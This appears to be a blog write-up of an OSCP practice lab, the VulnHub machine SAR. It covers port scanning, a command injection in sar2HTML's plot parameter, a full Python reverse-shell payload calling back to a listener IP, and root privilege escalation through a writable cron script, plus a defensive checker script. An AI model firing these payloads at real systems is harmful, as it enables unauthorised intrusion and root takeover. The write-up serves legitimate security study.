Machines I Solved for OSCP (SAR)
Hello People, I recently passed my OSCP certification. As part of that journey I solved a number of Windows and Linux machines on Hack The Box, the OffSec Proving Grounds labs and VulnHub. This series of posts covers the machines I practised on. I'm not assuming you are a beginner, so I won't explain every command; the point is to show my methodology for approaching a machine.
SAR
https://www.vulnhub.com/entry/sar-1,425/
Nmap scan: my methodology is to run the following three commands in order (a quick default scan for the common ports, a full-port scan so nothing is missed, then version detection and default scripts against only the ports found open):
- nmap -v <IP>
- nmap -p- <IP>
- nmap -p <open ports> <IP> -sV -sC -T4
nmap 192.168.183.35 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 14:36 EDT
Nmap scan report for 192.168.183.35
Host is up (0.038s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 27.47 seconds
The full-port scan shows only 22 (SSH) and 80 (HTTP) open, so the web application on port 80 is where to start.
Directory brute forcing (dirb, feroxbuster, gobuster, dirsearch)
I usually start with the basic tool dirb and its default wordlist, then move to feroxbuster with a medium wordlist; most of the time my hits come from the medium wordlist. Let's start with dirb. Here it already turns up /sar2HTML/ on the web root.
So what is sar2HTML? It is a small PHP web front end that renders the performance data collected by sysstat's sar as graphs. The data set to draw is chosen through the plot query parameter, and that value is interpolated into a shell command without any sanitisation, which is the known command injection we will use.
The exploit
Visit http://192.168.183.35/sar2HTML/index.php?plot=id, send that request to Burp and then to Repeater.
Add a semicolon before the command: because the plot value ends up on a shell command line, the semicolon terminates the application's own command and everything after it runs as a second command under the web server user. With plot=;id the output of id appears in the response. URL-encode the payload in Repeater (Ctrl+U) before sending so the semicolon, spaces and quotes survive the request.
For a shell, start a listener first (nc -lvnp 443 on 192.168.45.243), then send the following as the plot value:
192.168.183.35/sar2HTML/index.php?plot=;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.243",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
While waiting for the callback, check your notes.
Privilege Escalation
From the web shell I listed /var/www/html and found two interesting files, finally.sh and write.sh. /etc/crontab shows a root cron job that runs finally.sh every minute, and finally.sh in turn executes write.sh. Check the permissions of both: a script executed by a root cron job that www-data can write to is the privilege escalation path, because any command appended to it runs as root on the next cron run.
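As an added example (my own code, not from the post), here is the check I would script for this class of privilege escalation: parse /etc/crontab, take every job that runs as root, resolve the scripts it calls (including a leading cd and a sudo prefix, and one level of scripts those scripts invoke, which is how finally.sh leads to write.sh), and report any that are world-writable. The crontab text and the files it builds under a temporary directory are constructed for the example; the schedule and file names follow the post, the script contents are placeholders.

```python
import os
import stat
import tempfile

# Constructed /etc/crontab text for the example (not copied from the box).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/1 *   * * *   root    cd /var/www/html/ && sudo ./finally.sh
"""


def parse_system_crontab(text):
    """Return (schedule, user, command) tuples from /etc/crontab-style text,
    skipping blank lines, comments and VAR=value assignments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        entries.append((" ".join(fields[:5]), fields[5], fields[6]))
    return entries


def referenced_scripts(command):
    """Scripts a cron command runs, with 'cd DIR &&' honoured so relative
    paths such as ./finally.sh resolve, and a 'sudo' prefix stripped."""
    cwd, scripts = "/", []
    for segment in command.split("&&"):
        tokens = segment.split()
        if not tokens:
            continue
        if tokens[0] == "cd" and len(tokens) > 1:
            cwd = tokens[1]
            continue
        if tokens[0] == "sudo":
            tokens = tokens[1:]
        if tokens and tokens[0].endswith(".sh"):
            scripts.append(os.path.normpath(os.path.join(cwd, tokens[0])))
    return scripts


def called_scripts(real_path, virtual_path):
    """One level of chaining: scripts that a script itself invokes, resolved
    relative to the script's own directory (finally.sh running ./write.sh)."""
    try:
        with open(real_path) as fh:
            lines = fh.read().splitlines()
    except OSError:
        return []
    base = os.path.dirname(virtual_path)
    found = []
    for line in lines:
        line = line.strip()
        if line and not line.startswith("#") and line.split()[0].endswith(".sh"):
            found.append(os.path.normpath(os.path.join(base, line.split()[0])))
    return found


def world_writable(path):
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def writable_root_cron_scripts(crontab_text, root="/"):
    """Scripts run (directly or one hop down) by root cron jobs that anyone
    can write to. `root` lets the check run against a constructed tree."""
    real = lambda p: os.path.join(root, p.lstrip("/"))
    candidates = []
    for _, user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for script in referenced_scripts(command):
            candidates.append(script)
            candidates.extend(called_scripts(real(script), script))
    return [s for s in candidates if world_writable(real(s))]


def demo_tree():
    """Constructed copy of the relevant files: finally.sh is 0755 and calls
    ./write.sh, which is world-writable (the misconfiguration)."""
    root = tempfile.mkdtemp()
    html = os.path.join(root, "var/www/html")
    os.makedirs(html)
    finally_sh, write_sh = os.path.join(html, "finally.sh"), os.path.join(html, "write.sh")
    with open(finally_sh, "w") as fh:
        fh.write("#!/bin/sh\n./write.sh\n")
    with open(write_sh, "w") as fh:
        fh.write("#!/bin/sh\necho placeholder\n")
    os.chmod(finally_sh, 0o755)
    os.chmod(write_sh, 0o777)
    return root


if __name__ == "__main__":
    print(writable_root_cron_scripts(SAMPLE_CRONTAB, root=demo_tree()))
```

On a real target run it with the default root="/" after reading /etc/crontab; every path it prints is a file you can append a command to and have executed as root at the next scheduled run, so check /etc/cron.d/* and the script's own directory permissions the same way.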
Conclusion
Thanks for visiting my blog. Please let me know on LinkedIn if you have any feedback for me. I will see you next time, bye now!
